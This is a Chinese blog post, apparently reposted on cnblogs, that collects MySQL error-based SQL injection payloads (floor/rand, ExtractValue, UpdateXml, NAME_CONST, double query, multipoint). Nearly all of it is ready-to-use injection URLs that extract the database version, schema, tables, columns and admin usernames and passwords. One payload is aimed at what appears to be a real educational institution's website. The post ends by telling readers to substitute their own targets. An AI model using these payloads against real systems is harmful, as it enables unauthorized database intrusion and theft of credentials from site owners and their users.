• MYSQL报错注入方法整理


    1、通过floor暴错

    /*数据库版本*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*连接用户*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*连接数据库*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*暴库*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*暴表*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*暴字段*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    /*暴内容*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    2、ExtractValue(有长度限制,最长32位)

    SQL
    http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))
    http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

    3、UpdateXml(有长度限制,最长32位)

    SQL
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
    http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

    4、NAME_CONST(适用于低版本)

    SQL
    http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--

    5、Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)

    /*数据库版本*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1

    6、Multipoint(新方法)

    /*数据库版本*/

    SQL
    http://www.hackblog.cn/sql.php?id=1 and 1=(select multipoint((select * from(select * from(select version())f)x)))

    大家自己找关键字替换自己想要查询的东西。

    本文由Hack Blog原创,如需转载注明原文链接http://www.hackblog.cn/post/36.html

     

     
  • 相关阅读:
    详解 CSS 属性
    【技巧】DataGridView,ListView重新绑定时保持上次滚动位置
    c#自动更新+安装程序的制作 (转)
    C#winform程序安装时自动卸载新版本覆盖旧版本
    C# 操作XML文件,用XML文件保存信息
    c# winform 隐藏tabcontrol标签
    datagridview用get,set访问并加锁,可以控制所有使用datagridview的地方都顺序进行访问
    sql 获取当天开始时间 结束时间
    批量导出指定注册表内容
    sql server 保留小数,向上保留指定位数的小数,仅记录,勿看。
  • 原文地址:https://www.cnblogs.com/vspiders/p/7400176.html
Copyright © 2020-2023  润新知